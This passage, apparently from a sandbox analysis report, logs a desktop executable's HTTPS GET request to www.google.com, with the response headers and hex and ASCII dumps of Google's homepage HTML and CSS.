                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC195INData Raw: 34 64 39 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                Data Ascii: 4d96<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 30 37 2c 35 31 37 2c 31 31 2c 31 37 39 31 2c 31 37 2c 35 35 39 2c 31 35 31 2c 33 36 31 2c 32 38 32 2c 34 30 30 2c 31 2c 33 38 37 2c 32 2c 36 33 36 2c 35 30 38 2c 31 36 38 2c 38 31 2c 31 34 32 2c 32 35 32 2c 32 31 33 2c 32 2c 37 2c 31 2c 31 32 38 2c 36 32 2c 31 38 31 2c 39 31 36 2c 32 33 33 2c 33 36 2c 35 36 33 2c 32 35 37 2c 32 32 33 2c 31 36 39 31 2c 38 30 2c 38 35 33 2c 31 36 37 2c 31 38 36 2c 31 31 31 2c 31 39 38 2c 38 33 37 2c 31 37 2c 33 2c 38 30 31 2c 32 31 2c 36 36 37 2c 31 36 33 30 2c 33 35 32 2c 36 37 36 2c 31 36 38 2c 33 2c 33 30 31 2c 31 31 33 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 38 35 2c 37 37 2c 37 32 37 2c 36 34 37 2c 33 2c 33 2c 36 2c 32 31 31 2c 33 32 36 2c 31 37 32 2c 36 34 31 2c 31 36 2c 31 2c 31 2c 31 2c 37 36 2c 39 34 34 2c
                                                                                                                                                                                                                Data Ascii: 07,517,11,1791,17,559,151,361,282,400,1,387,2,636,508,168,81,142,252,213,2,7,1,128,62,181,916,233,36,563,257,223,1691,80,853,167,186,111,198,837,17,3,801,21,667,1630,352,676,168,3,301,113,1604,1,5,4,4,4,85,77,727,647,3,3,6,211,326,172,641,16,1,1,1,76,944,
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e
                                                                                                                                                                                                                Data Ascii: turn null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65
                                                                                                                                                                                                                Data Ascii: l(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70
                                                                                                                                                                                                                Data Ascii: -2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6p
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75
                                                                                                                                                                                                                Data Ascii: 2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{backgrou
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c
                                                                                                                                                                                                                Data Ascii: 0px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67
                                                                                                                                                                                                                Data Ascii: lid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rg
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a
                                                                                                                                                                                                                Data Ascii: ;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                14192.168.2.649723142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-HbfyeaIJJiV4-IFxleNtHQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-UslHlkJNRGduS8HHXWk_oaLv34V81jNCRJLLtlAwrAGtMT6oAg96A; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=XWqnYnOkmXxiRx9eB1cq7HE6PyKPm0gU_yt6WBrcUr6XIn7IrrgNQz9RUzhVwRE9TZPdJmdmkC1a_FZvJjqZxkQlbJt5V0-zd2FfjscMaVwLvXrMqrKMu1L9_3M_Np-dPAUUBJkHhUT3-4jW2embk1w47Gt_cvwtBTLodjGMTHzKYmuuEznPVZ3vc_MCUD933WKvnNj5Wnc-CrWQ1Q; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC191INData Raw: 35 31 63 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                                Data Ascii: 51cf<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                                Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 31 35 31 2c 36 2c 33 35 36 2c 36 38 31 2c 31 2c 38 2c 33 37 39 2c 32 2c 32 35 31 2c 36 39 32 2c 32 30 30 2c 31 36 39 2c 38 31 2c 31 34 32 2c 36 30 33 2c 36 32 2c 32 30 2c 31 37 31 2c 39 30 36 2c 32 36 39 2c 35 36 33 2c 32 35 37 2c 32 32 31 2c 34 35 38 2c 32 31 36 38 2c 31 36 37 2c 31 30 34 37 2c 33 30 36 2c 31 37 2c 33 2c 31 32 30 2c 32 2c 36 2c 31 39 36 2c 39 38 2c 33 2c 33 35 35 2c 33 33 30 2c 34 39 36 2c 31 2c 31 38 34 33 2c 33 36 30 2c 33 31 36 2c 31 36 34 2c 33 2c 34 31 38 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 37 31 31 2c 31 37 2c 36 34 36 2c 34 2c 33 2c 32 31 36 2c 34 39 38 2c 31 30 32 2c 31 39 38 2c 31 39 30 2c 37 2c 31 34 34 2c 31 36 2c 31 2c 31 2c 37 39 2c 38 33 38 2c 31 30 34 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c
                                                                                                                                                                                                                Data Ascii: 151,6,356,681,1,8,379,2,251,692,200,169,81,142,603,62,20,171,906,269,563,257,221,458,2168,167,1047,306,17,3,120,2,6,196,98,3,355,330,496,1,1843,360,316,164,3,418,1604,1,5,4,4,4,162,711,17,646,4,3,216,498,102,198,190,7,144,16,1,1,79,838,104,2,1,2,2,2,3,41,
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e
                                                                                                                                                                                                                Data Ascii: le.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(fun
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73
                                                                                                                                                                                                                Data Ascii: t><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;vis
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c
                                                                                                                                                                                                                Data Ascii: ;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                                Data Ascii: s{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://
